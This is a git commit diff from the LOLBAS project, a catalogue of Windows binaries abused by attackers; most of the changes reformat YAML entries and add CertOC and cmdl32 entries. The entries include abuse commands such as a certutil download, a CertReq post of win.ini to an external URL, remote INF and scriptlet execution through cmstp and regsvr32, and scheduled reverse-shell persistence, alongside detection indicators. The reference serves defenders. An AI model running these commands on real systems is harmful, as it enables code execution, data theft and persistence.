mirror of
https://github.com/LOLBAS-Project/LOLBAS
synced 2024-12-25 06:18:50 +01:00
Merge branch 'master' into master
This commit is contained in:
commit
1b15eccf07
12
.github/workflows/yamllinting.yml
vendored
Normal file
12
.github/workflows/yamllinting.yml
vendored
Normal file
@ -0,0 +1,12 @@
|
||||
---
|
||||
name: Yaml Lint
|
||||
on: [push, pull_request]
|
||||
jobs:
|
||||
lintFiles:
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- uses: actions/checkout@v1
|
||||
- name: yaml-lint
|
||||
uses: ibiqlik/action-yamllint@v3
|
||||
with:
|
||||
config_file: .yamllint
|
15
.yamllint
Normal file
15
.yamllint
Normal file
@ -0,0 +1,15 @@
|
||||
---
|
||||
extends: default
|
||||
yaml-files:
|
||||
- '*.yml'
|
||||
rules:
|
||||
new-line-at-end-of-file:
|
||||
level: warning
|
||||
trailing-spaces:
|
||||
level: warning
|
||||
line-length:
|
||||
level: warning
|
||||
new-lines:
|
||||
level: warning
|
||||
indentation:
|
||||
level: warning
|
@ -34,7 +34,6 @@ Resources:
|
||||
- Link: Threatintelreport...
|
||||
Acknowledgement:
|
||||
- Person: John Doe
|
||||
Handle: @johndoe
|
||||
Handle: '@johndoe'
|
||||
- Person: Ola Norman
|
||||
Handle: @olaNor
|
||||
---
|
||||
Handle: '@olaNor'
|
@ -14,5 +14,6 @@ Code_Sample: []
|
||||
Detection: []
|
||||
Resources:
|
||||
- https://twitter.com/bohops/status/986984122563391488
|
||||
Notes: Thanks to Jimmy - @bohops
|
||||
|
||||
Acknowledgement:
|
||||
- Person: Jimmy
|
||||
Handle: '@bohops'
|
@ -22,5 +22,6 @@ Resources:
|
||||
- https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Persistence/Netsh_Helper_DLL.md
|
||||
- https://attack.mitre.org/wiki/Technique/T1128
|
||||
- https://twitter.com/teemuluotio/status/990532938952527873
|
||||
Notes: ''
|
||||
|
||||
Acknowledgement:
|
||||
- Person: ''
|
||||
- Handle: ''
|
@ -2,8 +2,7 @@
|
||||
Name: Nltest.exe
|
||||
Description: Credentials
|
||||
Author: ''
|
||||
Created: '2018-05-25'
|
||||
Categories: []
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: nltest.exe /SERVER:192.168.1.10 /QUERY
|
||||
Description: ''
|
||||
@ -14,4 +13,6 @@ Detection: []
|
||||
Resources:
|
||||
- https://twitter.com/sysopfb/status/986799053668139009
|
||||
- https://ss64.com/nt/nltest.html
|
||||
Notes: Thanks to Sysopfb - @sysopfb
|
||||
Acknowledgement:
|
||||
- Person: Sysopfb
|
||||
Handle: '@sysopfb'
|
||||
|
@ -3,7 +3,6 @@ Name: Openwith.exe
|
||||
Description: Execute
|
||||
Author: ''
|
||||
Created: '2018-05-25'
|
||||
Categories: []
|
||||
Commands:
|
||||
- Command: OpenWith.exe /c C:\test.hta
|
||||
Description: Opens the target file with the default application.
|
||||
@ -16,5 +15,6 @@ Code_Sample: []
|
||||
Detection: []
|
||||
Resources:
|
||||
- https://twitter.com/harr0ey/status/991670870384021504
|
||||
Notes: Thanks to Matt harr0ey - @harr0ey
|
||||
|
||||
Acknowledgement:
|
||||
- Person: Matt harr0ey
|
||||
Handle: '@harr0ey'
|
@ -3,7 +3,6 @@ Name: Powershell.exe
|
||||
Description: Execute, Read ADS
|
||||
Author: ''
|
||||
Created: '2018-05-25'
|
||||
Categories: []
|
||||
Commands:
|
||||
- Command: powershell -ep bypass - < c:\temp:ttt
|
||||
Description: Execute the encoded PowerShell command stored in an Alternate Data Stream (ADS).
|
||||
@ -14,5 +13,6 @@ Code_Sample: []
|
||||
Detection: []
|
||||
Resources:
|
||||
- https://twitter.com/Moriarty_Meng/status/984380793383370752
|
||||
Notes: Thanks to Moriarty - @Moriarty_Meng
|
||||
|
||||
Acknowledgement:
|
||||
- Person: Moriarty
|
||||
Handle: '@Moriarty_Meng'
|
@ -18,5 +18,6 @@ Code_Sample: []
|
||||
Detection: []
|
||||
Resources:
|
||||
- https://www.sans.org/summit-archives/file/summit-archive-1493861893.pdf
|
||||
Notes: 'Thanks to '
|
||||
|
||||
Acknowledgement:
|
||||
- Person: ''
|
||||
- Handle: ''
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Robocopy.exe
|
||||
Description: Copy
|
||||
Author: ''
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Categories: []
|
||||
Commands:
|
||||
- Command: Robocopy.exe C:\SourceFolder C:\DestFolder
|
||||
@ -16,5 +16,6 @@ Code_Sample: []
|
||||
Detection: []
|
||||
Resources:
|
||||
- https://social.technet.microsoft.com/wiki/contents/articles/1073.robocopy-and-a-few-examples.aspx
|
||||
Notes: Thanks to Name of guy - @twitterhandle
|
||||
|
||||
Acknowledgement:
|
||||
- Person: ''
|
||||
- Handle: ''
|
@ -2,8 +2,7 @@
|
||||
Name: AcroRd32.exe
|
||||
Description: Execute
|
||||
Author: ''
|
||||
Created: '2018-05-25'
|
||||
Categories: []
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: Replace C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe by your binary
|
||||
Description: Hijack RdrCEF.exe with a payload executable to launch when opening Adobe
|
||||
@ -13,4 +12,6 @@ Code_Sample: []
|
||||
Detection: []
|
||||
Resources:
|
||||
- https://twitter.com/pabraeken/status/997997818362155008
|
||||
Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken
|
||||
Acknowledgement:
|
||||
- Person: Pierre-Alexandre Braeken
|
||||
Handle: '@pabraeken'
|
||||
|
@ -2,8 +2,7 @@
|
||||
Name: Gpup.exe
|
||||
Description: Execute
|
||||
Author: ''
|
||||
Created: '2018-05-25'
|
||||
Categories: []
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: Gpup.exe -w whatever -e c:\Windows\System32\calc.exe
|
||||
Description: Execute another command through gpup.exe (Notepad++ binary).
|
||||
@ -13,4 +12,6 @@ Code_Sample: []
|
||||
Detection: []
|
||||
Resources:
|
||||
- https://twitter.com/pabraeken/status/997892519827558400
|
||||
Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken
|
||||
Acknowledgement:
|
||||
- Person: Pierre-Alexandre Braeken
|
||||
Handle: '@pabraeken'
|
||||
|
@ -2,8 +2,7 @@
|
||||
Name: Nlnotes.exe
|
||||
Description: Execute
|
||||
Author: ''
|
||||
Created: '2018-05-25'
|
||||
Categories: []
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: NLNOTES.EXE /authenticate "=N:\Lotus\Notes\Data\notes.ini" -Command if((Get-ExecutionPolicy ) -ne AllSigned) { Set-ExecutionPolicy -Scope Process Bypass }
|
||||
Description: Run PowerShell via LotusNotes.
|
||||
@ -14,4 +13,6 @@ Detection: []
|
||||
Resources:
|
||||
- https://gist.github.com/danielbohannon/50ec800e92a888b7d45486e5733c359f
|
||||
- https://twitter.com/HanseSecure/status/995578436059127808
|
||||
Notes: Thanks to Daniel Bohannon - @danielhbohannon
|
||||
Acknowledgement:
|
||||
- Person: Daniel Bohannon
|
||||
Handle: '@danielhbohannon'
|
||||
|
@ -2,8 +2,7 @@
|
||||
Name: Notes.exe
|
||||
Description: Execute
|
||||
Author: ''
|
||||
Created: '2018-05-25'
|
||||
Categories: []
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: Notes.exe "=N:\Lotus\Notes\Data\notes.ini" -Command if((Get-ExecutionPolicy) -ne AllSigned) { Set-ExecutionPolicy -Scope Process Bypass }
|
||||
Description: Run PowerShell via LotusNotes.
|
||||
@ -14,4 +13,6 @@ Detection: []
|
||||
Resources:
|
||||
- https://gist.github.com/danielbohannon/50ec800e92a888b7d45486e5733c359f
|
||||
- https://twitter.com/HanseSecure/status/995578436059127808
|
||||
Notes: Thanks to Daniel Bohannon - @danielhbohannon
|
||||
Acknowledgement:
|
||||
- Person: Daniel Bohannon
|
||||
Handle: '@danielhbohannon'
|
||||
|
@ -2,8 +2,7 @@
|
||||
Name: Nvudisp.exe
|
||||
Description: Execute, Copy, Add registry, Create shortcut, kill process
|
||||
Author: ''
|
||||
Created: '2018-05-25'
|
||||
Categories: []
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: Nvudisp.exe System calc.exe
|
||||
Description: Execute calc.exe as a subprocess.
|
||||
@ -23,4 +22,7 @@ Code_Sample: []
|
||||
Detection: []
|
||||
Resources:
|
||||
- http://sysadminconcombre.blogspot.ca/2018/04/run-system-commands-through-nvidia.html
|
||||
Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken
|
||||
Acknowledgement:
|
||||
- Person: Pierre-Alexandre Braeken
|
||||
Handle: '@pabraeken'
|
||||
|
||||
|
@ -2,8 +2,7 @@
|
||||
Name: Nvuhda6.exe
|
||||
Description: Execute, Copy, Add registry, Create shortcut, kill process
|
||||
Author: ''
|
||||
Created: '2018-05-25'
|
||||
Categories: []
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: nvuhda6.exe System calc.exe
|
||||
Description: Execute calc.exe as a subprocess.
|
||||
@ -23,4 +22,6 @@ Code_Sample: []
|
||||
Detection: []
|
||||
Resources:
|
||||
- http://www.hexacorn.com/blog/2017/11/10/reusigned-binaries-living-off-the-signed-land/
|
||||
Notes: Thanks to Adam - @hexacorn
|
||||
Acknowledgement:
|
||||
- Person: Adam
|
||||
Handle: '@hexacorn'
|
||||
|
@ -2,8 +2,7 @@
|
||||
Name: ROCCAT_Swarm.exe
|
||||
Description: Execute
|
||||
Author: ''
|
||||
Created: '2018-05-25'
|
||||
Categories: []
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: Replace ROCCAT_Swarm_Monitor.exe with your binary.exe
|
||||
Description: Hijack ROCCAT_Swarm_Monitor.exe and launch payload when executing ROCCAT_Swarm.exe
|
||||
@ -13,4 +12,6 @@ Code_Sample: []
|
||||
Detection: []
|
||||
Resources:
|
||||
- https://twitter.com/pabraeken/status/994213164484001793
|
||||
Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken
|
||||
Acknowledgement:
|
||||
- Person: Pierre-Alexandre Braeken
|
||||
Handle: '@pabraeken'
|
||||
|
@ -21,7 +21,7 @@ Detection:
|
||||
Resources:
|
||||
- Link: https://bartblaze.blogspot.com/2019/03/run-applications-and-scripts-using.html
|
||||
- Link: https://twitter.com/bartblaze/status/1107390776147881984
|
||||
Acknowledgement:
|
||||
Acknowledgement:
|
||||
- Person: Bart
|
||||
Handle: @bartblaze
|
||||
Handle: '@bartblaze'
|
||||
---
|
||||
|
@ -2,8 +2,7 @@
|
||||
Name: Setup.exe
|
||||
Description: Execute
|
||||
Author: ''
|
||||
Created: '2018-05-25'
|
||||
Categories: []
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: Run Setup.exe
|
||||
Description: Hijack hpbcsiServiceMarshaller.exe and run Setup.exe to launch a payload.
|
||||
@ -13,4 +12,6 @@ Code_Sample: []
|
||||
Detection: []
|
||||
Resources:
|
||||
- https://twitter.com/pabraeken/status/994381620588236800
|
||||
Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken
|
||||
Acknowledgement:
|
||||
- Person: Pierre-Alexandre Braeken
|
||||
Handle: '@pabraeken'
|
||||
|
@ -3,6 +3,7 @@ Name: Update.exe
|
||||
Description: Binary to update the existing installed Nuget/squirrel package. Part of Whatsapp installation.
|
||||
Author: 'Jesus Galvez'
|
||||
Created: '2020-11-01'
|
||||
Commands:
|
||||
- Command: Update.exe --processStart payload.exe --process-start-args "whatever args"
|
||||
Description: Copy your payload into "%localappdata%\Whatsapp\app-[version]\". Then run the command. Update.exe will execute the file you copied.
|
||||
Usecase: Execute binary
|
||||
@ -14,5 +15,5 @@ Created: '2020-11-01'
|
||||
Full_Path:
|
||||
- Path: '%localappdata%\Whatsapp\Update.exe'
|
||||
Detection:
|
||||
- IOC: "%localappdata%\Whatsapp\Update.exe" spawned an unknown process
|
||||
- IOC: '"%localappdata%\Whatsapp\Update.exe" spawned an unknown process'
|
||||
---
|
||||
|
@ -2,8 +2,7 @@
|
||||
Name: Usbinst.exe
|
||||
Description: Execute
|
||||
Author: ''
|
||||
Created: '2018-05-25'
|
||||
Categories: []
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: Usbinst.exe InstallHinfSection "DefaultInstall 128 c:\temp\calc.inf"
|
||||
Description: Execute calc.exe through DefaultInstall Section Directive in INF file.
|
||||
@ -13,4 +12,6 @@ Code_Sample: []
|
||||
Detection: []
|
||||
Resources:
|
||||
- https://twitter.com/pabraeken/status/993514357807108096
|
||||
Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken
|
||||
Acknowledgement:
|
||||
- Person: Pierre-Alexandre Braeken
|
||||
Handle: '@pabraeken'
|
||||
|
@ -2,8 +2,7 @@
|
||||
Name: VBoxDrvInst.exe
|
||||
Description: Persistence
|
||||
Author: ''
|
||||
Created: '2018-05-25'
|
||||
Categories: []
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: VBoxDrvInst.exe driver executeinf c:\temp\calc.inf
|
||||
Description: Set registry key-value for persistance via INF file call through VBoxDrvInst.exe
|
||||
@ -13,4 +12,6 @@ Code_Sample: []
|
||||
Detection: []
|
||||
Resources:
|
||||
- https://twitter.com/pabraeken/status/993497996179492864
|
||||
Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken
|
||||
Acknowledgement:
|
||||
- Person: Pierre-Alexandre Braeken
|
||||
Handle: '@pabraeken'
|
||||
|
@ -1,20 +1,20 @@
|
||||
Name: aswrundll.exe
|
||||
Description: This process is used by AVAST antivirus to run and execute any modules
|
||||
Author: Eli Salem
|
||||
Created: 19\03\2019
|
||||
Created: '2019-03-19'
|
||||
Commands:
|
||||
- Command: "C:\Program Files\Avast Software\Avast\aswrundll" "C:\Users\Public\Libraries\tempsys\module.dll"
|
||||
- Command: '"C:\Program Files\Avast Software\Avast\aswrundll" "C:\Users\Public\Libraries\tempsys\module.dll"'
|
||||
Description: Load and execute modules using aswrundll
|
||||
Usecase: Execute malicious modules using aswrundll.exe
|
||||
Category: Execute
|
||||
Privileges: Any
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full_Path:
|
||||
- Path: C:\Program Files\Avast Software\Avast\aswrundll
|
||||
- Path: 'C:\Program Files\Avast Software\Avast\aswrundll'
|
||||
Code_Sample:
|
||||
- Code: ["C:\Program Files\Avast Software\Avast\aswrundll" "C:\Users\Public\Libraries\tempsys\module.dll" "C:\Users\module.dll"]
|
||||
- Code: '["C:\Program Files\Avast Software\Avast\aswrundll" "C:\Users\Public\Libraries\tempsys\module.dll" "C:\Users\module.dll"]'
|
||||
Resources:
|
||||
- Link: https://www.cybereason.com/blog/information-stealing-malware-targeting-brazil-full-research
|
||||
Acknowledgement:
|
||||
Acknowledgement:
|
||||
- Person: Eli Salem
|
||||
handle: https://www.linkedin.com/in/eli-salem-954728150
|
||||
handle: 'https://www.linkedin.com/in/eli-salem-954728150'
|
@ -2,7 +2,7 @@
|
||||
Name: winword.exe
|
||||
Description: Document editor included with Microsoft Office.
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: winword.exe /l dllfile.dll
|
||||
Description: Launch DLL payload.
|
||||
@ -10,7 +10,7 @@ Commands:
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
MItreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows
|
||||
Full_Path:
|
||||
- Path: c:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
|
||||
@ -26,4 +26,4 @@ Acknowledgement:
|
||||
Handle: '@@vysecurity'
|
||||
- Person: Adam (Internals)
|
||||
Handle: '@Hexacorn'
|
||||
---
|
||||
---
|
||||
|
@ -2,18 +2,18 @@
|
||||
Name: testxlst.js
|
||||
Description: Script included with Pywin32.
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: cscript testxlst.js C:\test\test.xml c:\test\test.xls c:\test\test.out
|
||||
Description: Test Jscript included in Python tool to perform XSL transform (for payload execution).
|
||||
Categories: Execution
|
||||
Category: Execution
|
||||
Privileges: User
|
||||
MitreID: T1064
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1064
|
||||
OperatingSystem: Windows
|
||||
- Command: wscript testxlst.js C:\test\test.xml c:\test\test.xls c:\test\test.out
|
||||
Description: Test Jscript included in Python tool to perform XSL transform (for payload execution).
|
||||
Categories: Execution
|
||||
Category: Execution
|
||||
Privileges: User
|
||||
MitreID: T1064
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1064
|
||||
@ -25,4 +25,6 @@ Detection: []
|
||||
Resources:
|
||||
- https://twitter.com/bohops/status/993314069116485632
|
||||
- https://github.com/mhammond/pywin32
|
||||
Notes: Thanks to Jimmy - @bohops
|
||||
Acknowledgement:
|
||||
- Person: Jimmy
|
||||
Handle: '@bohops'
|
||||
|
@ -2,12 +2,12 @@
|
||||
Name: At.exe
|
||||
Description: Schedule periodic tasks
|
||||
Author: 'Freddie Barr-Smith'
|
||||
Created: '2019-09-20'
|
||||
Created: 2019-09-20
|
||||
Commands:
|
||||
- Command: C:\Windows\System32\at.exe at 09:00 /interactive /every:m,t,w,th,f,s,su C:\Windows\System32\revshell.exe
|
||||
Description: Create a recurring task to execute every day at a specific time.
|
||||
Description: Create a recurring task to execute every day at a specific time.
|
||||
Usecase: Create a recurring task, to eg. to keep reverse shell session(s) alive
|
||||
Category: Execute
|
||||
Category: Execute
|
||||
Privileges: Local Admin
|
||||
MitreID: T1053
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1053
|
||||
@ -17,10 +17,10 @@ Full_Path:
|
||||
- Path: C:\WINDOWS\SysWOW64\At.exe
|
||||
Detection:
|
||||
- IOC: Scheduled task is created
|
||||
- IOC: Windows event log - type 3 login
|
||||
- IOC: Windows event log - type 3 login
|
||||
- IOC: C:\Windows\System32\Tasks\At1 (substitute 1 with subsequent number of at job)
|
||||
- IOC: C:\Windows\Tasks\At1.job
|
||||
- IOC: Registry Key - Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\At1.
|
||||
- IOC: Registry Key - Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\At1.
|
||||
Resources:
|
||||
- Link: https://freddiebarrsmith.com/at.txt
|
||||
- Link: https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_windows.html - Escalate to System from Administrator
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Atbroker.exe
|
||||
Description: Helper binary for Assistive Technology (AT)
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: ATBroker.exe /start malware
|
||||
Description: Start a registered Assistive Technology (AT).
|
||||
@ -15,7 +15,7 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\Atbroker.exe
|
||||
- Path: C:\Windows\SysWOW64\Atbroker.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Changes to HKCU\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\Configuration
|
||||
@ -26,4 +26,4 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Adam
|
||||
Handle: '@hexacorn'
|
||||
---
|
||||
---
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Bash.exe
|
||||
Description: File used by Windows subsystem for Linux
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: bash.exe -c calc.exe
|
||||
Description: Executes calc.exe from bash.exe
|
||||
@ -39,7 +39,7 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\bash.exe
|
||||
- Path: C:\Windows\SysWOW64\bash.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Child process from bash.exe
|
||||
@ -50,4 +50,4 @@ Acknowledgement:
|
||||
Handle: '@aionescu'
|
||||
- Person: Asif Matadar
|
||||
Handle: '@d1r4c'
|
||||
---
|
||||
---
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Bitsadmin.exe
|
||||
Description: Used for managing background intelligent transfer
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: bitsadmin /create 1 bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\1.txt:cmd.exe NULL bitsadmin /RESUME 1 bitsadmin /complete 1
|
||||
Description: Create a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command from an Alternate data stream, then resume and complete the job.
|
||||
@ -39,7 +39,7 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\bitsadmin.exe
|
||||
- Path: C:\Windows\SysWOW64\bitsadmin.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Child process from bitsadmin.exe
|
||||
@ -56,4 +56,4 @@ Acknowledgement:
|
||||
Handle: '@carnal0wnage'
|
||||
- Person: Oddvar Moe
|
||||
Handle: '@oddvarmoe'
|
||||
---
|
||||
---
|
||||
|
28
yml/OSBinaries/Certoc.yml
Normal file
28
yml/OSBinaries/Certoc.yml
Normal file
@ -0,0 +1,28 @@
|
||||
---
|
||||
Name: CertOC.exe
|
||||
Description: Used for installing certificates
|
||||
Author: 'Ensar Samil'
|
||||
Created: '2021-10-07'
|
||||
Commands:
|
||||
- Command: certoc.exe -LoadDLL "C:\test\calc.dll"
|
||||
Description: Loads the target DLL file
|
||||
Usecase: Execute code within DLL file
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows Server 2022
|
||||
Full_Path:
|
||||
- Path: c:\windows\system32\certoc.exe
|
||||
- Path: c:\windows\syswow64\certoc.exe
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Process creation with given parameter
|
||||
- IOC: Unsigned DLL load via certoc.exe
|
||||
Resources:
|
||||
- Link: https://twitter.com/sblmsrsn/status/1445758411803480072?s=20
|
||||
Acknowledgement:
|
||||
- Person: Ensar Samil
|
||||
Handle: '@sblmsrsn'
|
||||
---
|
@ -2,7 +2,7 @@
|
||||
Name: CertReq.exe
|
||||
Description: Used for requesting and managing certificates
|
||||
Author: 'David Middlehurst'
|
||||
Created: '2020-07-07'
|
||||
Created: 2020-07-07
|
||||
Commands:
|
||||
- Command: CertReq -Post -config https://example.org/ c:\windows\win.ini output.txt
|
||||
Description: Save the response from a HTTP POST to the endpoint https://example.org/ as output.txt in the current directory
|
||||
@ -23,7 +23,7 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\certreq.exe
|
||||
- Path: C:\Windows\SysWOW64\certreq.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: certreq creates new files
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Certutil.exe
|
||||
Description: Windows binary used for handling certificates
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: certutil.exe -urlcache -split -f http://7-zip.org/a/7z1604-x64.exe 7zip.exe
|
||||
Description: Download and save 7zip to disk in the current folder.
|
||||
@ -44,7 +44,7 @@ Commands:
|
||||
MitreID: T1140
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1140
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
- Command: certutil --decodehex encoded_hexadecimal_InputFileName
|
||||
- Command: certutil --decodehex encoded_hexadecimal_InputFileName
|
||||
Description: Command to decode a hexadecimal-encoded file decodedOutputFileName
|
||||
Usecase: Decode files to evade defensive measures
|
||||
Category: Decode
|
||||
@ -55,7 +55,7 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\certutil.exe
|
||||
- Path: C:\Windows\SysWOW64\certutil.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Certutil.exe creating new files on disk
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Cmd.exe
|
||||
Description: The command-line interpreter in Windows
|
||||
Author: 'Ye Yint Min Thu Htut'
|
||||
Created: '2019-06-26'
|
||||
Created: 2019-06-26
|
||||
Commands:
|
||||
- Command: cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.010/src/RegSvr32.sct ^scrobj.dll > fakefile.doc:payload.bat
|
||||
Description: Add content to an Alternate Data Stream (ADS).
|
||||
@ -23,7 +23,7 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\cmd.exe
|
||||
- Path: C:\Windows\SysWOW64\cmd.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: cmd.exe executing files from alternate data streams.
|
||||
|
@ -1,8 +1,8 @@
|
||||
---
|
||||
Name: Cmdkey.exe
|
||||
Name: Cmdkey.exe
|
||||
Description: creates, lists, and deletes stored user names and passwords or credentials.
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: cmdkey /list
|
||||
Description: List cached credentials
|
||||
@ -15,7 +15,7 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\cmdkey.exe
|
||||
- Path: C:\Windows\SysWOW64\cmdkey.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Usage of this command could be an IOC
|
||||
@ -23,6 +23,6 @@ Resources:
|
||||
- Link: https://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-escalation
|
||||
- Link: https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/cmdkey
|
||||
Acknowledgement:
|
||||
- Person:
|
||||
- Person:
|
||||
Handle:
|
||||
---
|
||||
---
|
||||
|
26
yml/OSBinaries/Cmdl32.yml
Normal file
26
yml/OSBinaries/Cmdl32.yml
Normal file
@ -0,0 +1,26 @@
|
||||
---
|
||||
Name: cmdl32.exe
|
||||
Description: Microsoft Connection Manager Auto-Download
|
||||
Author: 'Elliot Killick'
|
||||
Created: '2021-08-26'
|
||||
Commands:
|
||||
- Command: cmdl32 /vpn /lan %cd%\config
|
||||
Description: Download a file from the web address specified in the configuration file. The downloaded file will be in %TMP% under the name VPNXXXX.tmp where "X" denotes a random number or letter.
|
||||
Usecase: Download file from Internet
|
||||
Category: Download
|
||||
Privileges: User
|
||||
MitreID: T1105
|
||||
MitreLink: https://attack.mitre.org/techniques/T1105/
|
||||
OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\cmdl32.exe
|
||||
- Path: C:\Windows\SysWOW64\cmdl32.exe
|
||||
Detection:
|
||||
- IOC: Reports of downloading from suspicious URLs in %TMP%\config.log
|
||||
- IOC: Useragent Microsoft(R) Connection Manager Vpn File Update
|
||||
Resources:
|
||||
- Link: https://github.com/LOLBAS-Project/LOLBAS/pull/151
|
||||
Acknowledgement:
|
||||
- Person: Elliot Killick
|
||||
Handle: '@elliotkillick'
|
||||
---
|
@ -2,11 +2,11 @@
|
||||
Name: Cmstp.exe
|
||||
Description: Installs or removes a Connection Manager service profile.
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: cmstp.exe /ni /s c:\cmstp\CorpVPN.inf
|
||||
Description: Silently installs a specially formatted local .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll.
|
||||
Usecase: Execute code hidden within an inf file. Download and run scriptlets from internet.
|
||||
Usecase: Execute code hidden within an inf file. Download and run scriptlets from internet.
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1191
|
||||
@ -14,7 +14,7 @@ Commands:
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
- Command: cmstp.exe /ni /s https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Cmstp.inf
|
||||
Description: Silently installs a specially formatted remote .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll.
|
||||
Usecase: Execute code hidden within an inf file. Execute code directly from Internet.
|
||||
Usecase: Execute code hidden within an inf file. Execute code directly from Internet.
|
||||
Category: AwL bypass
|
||||
Privileges: User
|
||||
MitreID: T1191
|
||||
@ -23,7 +23,7 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\cmstp.exe
|
||||
- Path: C:\Windows\SysWOW64\cmstp.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
